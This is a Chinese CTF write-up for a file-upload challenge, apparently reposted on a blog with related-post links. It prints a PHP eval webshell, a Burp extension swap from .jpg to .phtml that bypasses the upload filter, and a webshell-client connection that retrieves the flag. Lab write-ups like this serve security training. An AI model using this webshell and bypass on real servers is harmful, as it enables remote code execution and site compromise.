2. 程式人生 > 其它 >日常練習之web([ACTF2020 新生賽]Upload)

日常練習之web([ACTF2020 新生賽]Upload)

阿新 發佈:2020-12-10

技術標籤:webupload

開啟題目是一個燈泡,放上去會出現上傳檔案,但是隻能上傳jpg等圖片型別的檔案
在這裡插入圖片描述

很明顯上傳一個圖片馬

<script language='php'>@eval($_POST['pass']);</script>

放到txt裡字尾名改成jpg格式,burp抓一下包,把jpg改成phtml繞過php檢測
在這裡插入圖片描述

這裡可以看到上傳成功
在這裡插入圖片描述

拿出蟻劍或者菜刀連線你上傳的木馬在根目錄下找到flag
在這裡插入圖片描述

flag{1db8d2ff-bc9d-4d06-a4ef-94757f236712}

相關推薦

日常練習web[ACTF2020 新生]Upload

技術標籤:webupload 開啟題目是一個燈泡,放上去會出現上傳檔案,但是隻能上傳jpg等圖片型別的檔案

BUUCTF-Web:[ACTF2020 新生]Upload

題目 解題過程 1、上傳檔案 從網頁上來看,可以上傳檔案,我們嘗試上傳一個PHP一句話木馬。結果如下:

Buuctf-Web-[ACTF2020 新生]Include

前言 刷題網址:https://buuoj.cn/challenges#[ACTF2020 新生]Include 首先開啟網頁,提示tips點選他,根據題目提示很難不想到是檔案包含,但是提示是能找到外面的flag嗎,如下圖。

[BUUCTF][Web][ACTF2020 新生]Include 1

開啟靶機對應的url 顯示一個tips 超連結 點選訪問超連結,對應Url為 http://469398f2-5677-4270-a4a4-55c5e4a7504a.node4.buuoj.cn:81/?file=flag.php

[ACTF2020 新生]BackupFile

0x00 開啟WEB介面 提示找到備份,進行跑目錄,備份命名一般為www.*,backup,*.bak等 經過跑目錄我得到的結果是/index.php.bak

E 倉鼠與珂朵莉WHU新生

題目連結:https://ac.nowcoder.com/acm/contest/8925/E 題意:定義一個區間的重要程度:maxk*k在區間中的個數k為區間中的數,有m個查詢操作,求區間[l,r]間的重要程度。強制線上

BUUCTF [ACTF2020 新生]BackupFile

BackupFile,開啟網頁啥也沒有,用dirsearch掃描目錄 常見的備份檔案字尾名有 .git .svn .swp .~ .bak .bash_history

災星/盜賊公會日常任務地書信 上古卷軸OL書籍

偵察報告:死空洞大廳 B留 關於一處潛在打劫場所的報告 Fa'ren-dar法’仁-達爾——

[ACTF2020 新生]BackupFile-1

[ACTF2020 新生]BackupFile-1   1、通過dirsearch進行掃描,在掃描結果中發現了index.php.bak檔案,掃描結果如下:

OpenGL ESLUT濾鏡基準圖

前言 Look Up Table簡稱LUT,查詢表)。輸入一個值,然後通過查詢表來得到一個輸出值。在調色領域中,稱為顏色查詢表,查詢表的分量為R、G、B,是一種降低GPU運算量的技術,通過將顏色值儲存在一張表中,在需要的

iOS逆向學習Mac遠端操控iPhone

SSH、OpenSSH SSH 是Secure的縮寫,意為“安全外殼協議”,是一種可以為遠端登入提供安全保障的協議

Sine遞迴/遞推

Description 最近FJ為他的奶牛們開設了數學分析課,FJ知道若要學好這門課,必須有一個好的三角函式基本功。所以他準備和奶牛們做一個“Sine舞”的遊戲,寓教於樂,提高奶牛們的計算能力。

python介面自動化十九 簽名(signature)鑑權(authentication)加密HEX,MD5,HMAC-SHA256

前言 開放的介面為了避免被別人亂呼叫,浪費伺服器資源,這就涉及到簽名Signature加密了

Qt 圖形繪製漂亮的圓弧

簡述 綜合前面對二維繪圖的介紹,想必我們對一些基本繪圖有了深入的瞭解,下面我們來實現一些漂亮的圖形繪製。

c(++) 變長引數整形非字串型別類似

0、序言   變長引數,接觸的第一個可變長引數函式是 printf , 然後是 scanf 。他們的原型如下:

學習使用者連線性要素連線性附XMIND整理筆記

內容連線性是手機app設計的首要任務之一,還有我們的電腦、平板也是一樣。在2020年的物聯網環境中,將有超過260億的新產品被聯絡在一起。為了設計一個有價值的使用者體驗,設計師必須在設計app的時候充分考

#3058. 「HNOI2019」白兔單位根反演

題目描述 https://loj.ac/problem/3058 單位根反演 因為ω太難寫了所以用w代替 有\\([n|k]=\\frac{1}{n}\\sum_{i=0}^{n-1} w_n^{ik}\\)

脫離 Spring 實現複雜巢狀事務,MANDATORY - 要求存在事務

>>> 本文是<實現 Spring 的事務控制>系列文章中一篇。本文假設讀者已經閱讀並理解《實現 Spring 的事務控制,之一必要的概念》文中所涉及的概念當前連線、引用計數,以及資料庫

脫離 Spring 實現複雜巢狀事務,NOT_SUPPORTED - 非事務方式

>>> 本文是<實現 Spring 的事務控制>系列文章中一篇。本文假設讀者已經閱讀並理解《實現 Spring 的事務控制,之一必要的概念》文中所涉及的概念當前連線、引用計數,以及資料庫

脫離 Spring 實現複雜巢狀事務,NESTED - 巢狀事務

>>> 本文是<實現 Spring 的事務控制>系列文章中一篇。本文假設讀者已經閱讀並理解《實現 Spring 的事務控制,之一必要的概念》文中所涉及的概念當前連線、引用計數,以及資料庫